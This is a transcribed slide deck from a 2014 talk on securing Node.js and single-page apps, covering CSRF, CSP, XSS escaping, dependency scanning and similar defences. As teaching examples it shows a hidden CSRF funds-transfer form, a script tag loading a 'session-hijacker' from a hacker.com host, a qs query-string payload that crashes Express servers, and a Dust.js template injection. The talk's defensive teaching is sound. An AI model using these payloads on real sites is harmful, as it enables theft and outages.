Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Midwest JS 2014 - Securing your Node.js & Single Page Apps

Mark Stuart
August 14, 2014
Programming
2
340

Midwest JS 2014 - Securing your Node.js & Single Page Apps

My slide deck from my talk at Midwest JS 2014 - Securing your Node.js & Single Page Apps

Mark Stuart

August 14, 2014
Tweet

More Decks by Mark Stuart

See All by Mark Stuart
JS@PayPal 2015 - Insanely fast rendering w/ Service Workers and Early Flushing
mstuart
0
790
Splitting up 8Ball and building/sharing components
mstuart
0
85
enterJS 2014 - Securing your Node.js & Single Page Apps
mstuart
4
610
HTML5DevConf 2014 - Securing your JavaScript apps
mstuart
0
180

Other Decks in Programming

See All in Programming
スキーマ駆動開発による品質とスピードの両立 - 私達は何故、スキーマを書くのか
kentaroutakeda
0
160
"config" ってなんだ? / What is "config"?
okashoi
0
240
Ruby Function Composition
bkuhlmann
1
330
見た目から始める生産性向上
ikumatadokoro
7
770
R言語の環境構築と基礎 Tokyo.R 112
bob3bob3
0
250
GitHub Copilotのススメ
marcy731
0
190
入門 AWS Amplify Gen2 / Introduction to AWS Amplify Gen2
genkiogasawara
1
320
Compose-View Interop in Practice (mDevCamp 2024)
stewemetal
0
110
#phpcon_odawara オープン・クローズドなテストフィクスチャを求めて / open closed test fixtures
77web
3
220
What We Can Learn From OSS
inouehi
0
420
PostmanでAPIの動作確認が楽になった話
h455h1
0
160
コードレビューで学ぶ!Kotlinオブジェクト指向デザインパターン
akkie76
2
190

Featured

See All Featured
Web Components: a chance to create the future
zenorocha
305
41k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
119
39k
Fashionably flexible responsive web design (full day workshop)
malarkey
398
65k
The Mythical Team-Month
searls
215
42k
Building Your Own Lightsaber
phodgson
98
5.7k
Imperfection Machines: The Place of Print at Facebook
scottboms
259
12k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
13
1.5k
Automating Front-end Workflow
addyosmani
1355
200k
Building an army of robots
kneath
300
41k
Building Better People: How to give real-time feedback that sticks.
wjessup
354
18k
GraphQLとの向き合い方2022年版
quramy
31
12k
Raft: Consensus for Rubyists
vanstee
132
6.3k

Transcript

  1. Securing Your Node.js & Single Page Apps

  2. bit.ly/jssecurity

  3. @mark_stuart @mstuart

  4. How are you using JavaScript?

  5. So, why security?

  6. None
  7. None
  8. None

  9. Not just PayPal, but your company too.

  10. None
  11. None
  12. None

  13. The scoop on security

  14. Same vulnerabilities. Nothing new.

  15. ok cya.

  16. Same vulnerabilities. Different beast.

  17. Node

  18. Know what you require() Rule #1 ! ! !

  19. npm has ~80,000 modules

  20. modulecounts.com

  21. Really great developer ecosystem, except…

  22. Anyone can publish anything

  23. Node is still JavaScript ! ! ! Rule #2

  24. Client-side vulnerabilities still exist on the server-side

  25. Eval is still evil

  26. Do not run as root ! ! ! Rule #3

  27. Running as root is wreckless

  28. If you’re compromised, terrible things could happen

  29. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  30. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  31. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  32. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  33. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  34. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  35. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  36. Steal SSH keys or configs Read/write files Execute binaries Cause

    server to hang Tamper with routes Inject XSS Steal session data Crash server

  37. Ok, so if not root, then what?

  38. Create a user for node with restricted permissions ! (plenty

    of docs out there)

  39. Create a user for node with restricted permissions ! (plenty

    of docs out there)

  40. Create a user for node with restricted permissions ! (plenty

    of docs out there)

  41. Use good security defaults ! ! ! Rule #4

  42. Node is a set of barebones modules

  43. HTTP OS DNS TLS/SSL Path Process UDP URL File System

    Crypto Buffer

  44. Express is a barebones framework

  45. Express does very little to secure your app

  46. But, that’s okay!

  47. … drum roll …

  48. None

  49. Enterprise-grade Express "

  50. Lusca App Security module for Express

  51. var express = require(‘express’), app = express(), lusca = require(‘lusca’);

  52. app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 });

    app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

  53. Pardon the interruption

  54. CSRF

  55. Trick victim’s browser into making malicious requests CSRF

  56. All you need is a valid cookie CSRF

  57. # User yoursite.com " Cookie CSRF

  58. CSRF # User hackedsite.com Cookie

  59. <form name=“someHiddenForm” action=“http://yoursite.com/webapps/ transferFunds”> <input type=“hidden” name=“amount” value=“500.00” /> <input

    type=“hidden” name=“recipient” value=“[email protected]” /> </form> ! <script>document.forms.someHiddenForm.submit();</script> CSRF

  60. # User hackedsite.com Cookie yoursite.com CSRF POST /transferFunds

  61. It’s a simple HTTP request. CSRF

  62. If only we had a way to ensure requests were

    legitimate… CSRF

  63. lusca.csrf();

  64. Token synchronizer pattern lusca.csrf();

  65. 1. Creates a random token (using some crazy crypto libraries)

    lusca.csrf();

  66. 2. Adds token to res.locals lusca.csrf();

  67. 3. Dump token on the page <input type=“hidden” name=“csrf” value=“{{_csrf}}”

    /> lusca.csrf();

  68. 4. Send token with every POST, PUT, DELETE request lusca.csrf();

  69. $.ajaxPrefilter(function(options, _, xhr) { if (!xhr.crossDomain) { xhr.setRequestHeader('X-CSRF-Token', csrfToken); }

    }); lusca.csrf();

  70. 5. Verify token is correct, otherwise return 403. lusca.csrf();

  71. CSP

  72. CSP is really awesome.

  73. It’s basically a whitelist.

  74. Content-Security-Policy: default-src 'self' https://*.your-cdn.com; script-src 'self' https://*.your-cdn.com; img-src https://*.your-cdn.com data:;

    object-src 'self'; font-src 'self' https://*.googlefonts.com; connect-src … frame-src … style-src … media-src …
  75. None

  76. lusca.csp( { /* … */ } );

  77. lusca.csp({ "default-src": "'self' https://*.your-cdn.com”, "script-src": “'self' https://*.your-cdn.com”, "img-src": “https://*.your-cdn.com data:”,

    "font-src": “‘self’", “report-uri”: “https://mysite.com/cspReporter” });

  78. “report-uri”: “https://mysite.com/cspReporter”

  79. lusca.hsts();

  80. lusca.hsts(); Ensures HTTPS traffic

  81. Helps prevent MITM attacks lusca.hsts();

  82. lusca.xframe();

  83. lusca.xframe(); Prevent others from loading your app in an iframe

  84. None

  85. app.use(lusca.xssProtection()); app.use(lusca.p3p());

  86. app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 });

    app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

  87. Okay, now where were we?

  88. HTTPOnly cookies

  89. Prevents session hijacking HTTPOnly cookies

  90. app.use(express.session({ secret: ‘0m6!s3cr37’, cookie: { httpOnly: true, secure: true },

    })); HTTPOnly cookies

  91. Set-Cookie:! connect.sid=%3AbzLqvcp7DnQJMaLAPmJ7p; ! Path=/; Expires=Wed, 21 May 2014 18:26:44 GMT;

    HttpOnly HTTPOnly cookies

  92. Handle errors, or crash. ! ! ! Rule #5

  93. ! Wed, 21 May 2014 18:49:00 GMT ! uncaughtException Object

    #<Object> has no method ‘forEach'! ! TypeError: Object #<Object> has no method 'forEach'! at module.exports.fetchSettings (/Users/marstuart/oddjob/helpers.js:174:18)! ! Process finished with exit code 1!

  94. Basically, a DOS attack

  95. Catch them or restart

  96. Scan for vulnerable modules ! ! ! Rule #6

  97. Node Security Project http://nodesecurity.io

  98. Audit all modules in npm

  99. Contribute patches

  100. None

  101. Educate others

  102. npm install grunt-nsp-package --save-dev grunt validate-package

  103. None

  104. Define custom rules ESLint

  105. Security can be automated

  106. Make it a part of your CI

  107. Update your dependencies ! ! ! Rule #7

  108. August 6th, just 1 week ago..

  109. DoS attack with qs

  110. qs is a query string parser

  111. qs.parse(‘a=c’); // { a: ‘c’ }

  112. qs.parse(‘a=c’); // { a: ‘c’ } qs.parse(‘a[1]=c&a[0]=b’); // { a:

    [‘b’, ‘c’] }

  113. qs.parse(‘foo[0][100000000]=ba’); ! FATAL ERROR: JS Allocation failed - process out

    of memory Abort trap: 6

  114. qs is used by lots of popular modules

  115. express hapi restify body-parser restler superagent

  116. express hapi restify body-parser restler superagent

  117. express hapi restify body-parser restler superagent

  118. express hapi restify body-parser restler superagent

  119. express hapi restify body-parser restler superagent

  120. express hapi restify body-parser restler superagent

  121. The problem is…

  122. Most of us are using express

  123. Just pass foo[0][100000000]=ba as your user agent

  124. Or… pass foo[0][100000000]=ba as a query string param

  125. And you can crash the server FATAL ERROR: JS Allocation

    failed - process out of memory

  126. And you can crash the server FATAL ERROR: JS Allocation

    failed - process out of memory

  127. Good news!

  128. It’s been patched

  129. Although you’re probably running an old version

  130. Update your dependencies

  131. Add a badge to your README

  132. None
  133. None

  134. david-dm.org <img src=“https://david-dm.org/username/repo.png” />

  135. Let’s recap…

  136. 1. Know what you require() 2. Node is still JavaScript

    3. Do not run as root 3. Use good security defaults 4. Security can be automated, too!

  137. Client-side JS

  138. Escape everything. ! ! ! Rule #1

  139. Content injection

  140. XSS sucks. It’s everywhere.

  141. <script src=“http://hacker.com/session-hijacker.js”></script> &lt;script src=&#39;http://hacker.com/ sessionhijacker.js&#39;&gt;&lt;/script&gt;

  142. User input and backend data

  143. Don’t trust backend services to escape properly

  144. Persistent or Stored XSS

  145. # Attacker yoursite.com PUT /account/edit { firstName: ‘<script>…’ } #

    Victim # Victim <script>…</script> GET /addressBook <script>…</script> GET /addressBook yoursite.com yoursite.com

  146. Case Study: TweetDeck worm

  147. TweetDeck worm

  148. TweetDeck worm

  149. Just one tweet. TweetDeck worm

  150. Just two months ago. TweetDeck worm

  151. … So how do I escape?

  152. DOMPurify and Google Caja

  153. <script src=“dompurify.js"></script> DOMPurify Plain ol’ JavaScript var clean = DOMPurify.sanitize(dirty);

  154. require(['dompurify'], function(DOMPurify) { var clean = DOMPurify.sanitize(dirty); }); RequireJS /

    AMD DOMPurify

  155. Node? DOMPurify

  156. Node? DOMPurify Coming soon!

  157. Know your templating library. ! ! ! Rule #2

  158. Use it properly.

  159. Underscore templates

  160. <input type=“text” name=“zipCode” value=“<%- zipCode %>” /> <input type=“text” name=“zipCode”

    value=“<%= zipCode %>” />

  161. Dust.js templates

  162. {@if cond=“{cardType} === ‘VISA’”} <li class=“visa”></li> {/if}

  163. {@if cond=“{zipCode} === {defaultZipCode}”} <li class=“default”></li> {/if} { “zipCode”: “\\”,

    “defaultZipCode”: “);process.exit();//“ }

  164. Your server crashed. $

  165. Upgrade your front-end dependencies. ! ! ! Rule #3

  166. Retire.js

  167. jQuery <1.9.0 jQuery Mobile <1.0.1 Backbone <0.5.0 Angular <1.2.0 Handlebars

    <1.0.0 YUI <3.9.2 Ember <1.3.2 Mustache <0.3.1 easyXDM <2.4.19

  168. Running "retire:jsPath" (retire) task! ! >> test-files/jquery-1.6.js! >> ↳ jquery

    1.6 has known vulnerabilities: http://web.nvd.nist.gov/view/ vuln/detail?vulnId=CVE-2011-4969! ! >> Aborted due to warnings. npm install grunt-retire --save-dev grunt retire

  169. Automate it!

  170. C’mon, it’s 1 line.

  171. Rules of Thumb

  172. No matter what you do, someone will always find a

    way in

  173. But, you’ll get 80% there if you…

  174. Choose libraries with good security defaults. ! ! !

  175. Sanitize data coming in and going out. ! ! !

  176. Update your dependencies! ! ! !

  177. Automate security, too. ! ! !

  178. Ok.

  179. Ok. so,

  180. Ok. so, listen…

  181. Node is awesome.

  182. It’s enterprise ready.

  183. We just need to write better, more secure apps.

  184. thanks!

  185. We’re hiring!

  186. mark stuart @mark_stuart @mstuart

  187. Links https://github.com/nodesecurity/grunt-nsp-package https://github.com/bekk/grunt-retire https://nodesecurity.io/ https://github.com/evilpacket/helmet http://krakenjs.com/ https://github.com/krakenjs/lusca https://david-dm.org/ https://www.owasp.org/index.php/Cross-Site